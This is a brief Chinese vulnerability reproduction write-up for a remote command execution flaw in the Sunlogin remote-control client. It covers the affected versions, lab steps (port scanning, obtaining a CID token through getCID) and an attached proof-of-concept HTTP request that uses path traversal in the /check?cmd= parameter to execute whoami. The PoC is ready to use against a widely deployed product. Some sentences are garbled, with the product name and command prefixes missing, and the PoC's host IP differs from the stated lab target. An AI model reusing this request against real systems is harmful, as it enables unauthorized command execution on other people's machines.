一、介绍
是企业和专业人员的远程pc管理和控制服务软件。在任何有网络的情况下,都可以轻松访问和控制安装向日葵客户端的远程主机。同时,还可以实现远程文件传输、远程视频监控等功能,不仅为用户的使用带来了极大的便利,也为用户提供了各种保障。
Sunlogin RCE 界面上发生了漏洞/check处,当参数cmd的值以或者一开始,可以构建命令,实现远程命令的执行和使用。当客户端打开时,客户端将自动随机打开4万多个端口号。
二、影响版本
客户端版:
- 11.1.1
- 10.3.0.27372
- 11.0.0.33162
三、漏洞复现
向日贵客户端版:11.0.0.33162
操作系统:win10
目标靶机IP地址:192.168.18.129
1.安装向日葵客户端并运行
2.目标机使用御剑高速扫描端口工具IP扫描4万多个端口
通过curl验证漏洞
使用getCID获取脚本token,放到poc的cookie中验证
命令执行成功
脚本可以自动获得token并执行命令
附poc:
GET /check?cmd=ping../../../../../../../../../../../windows/system32/whoami HTTP/1.1 Host: 192.168.200.209:50915 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Connection: close Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Cookie: CID=ciiHpsOHS1UtC5ZfZMrA1gApw9htv8ph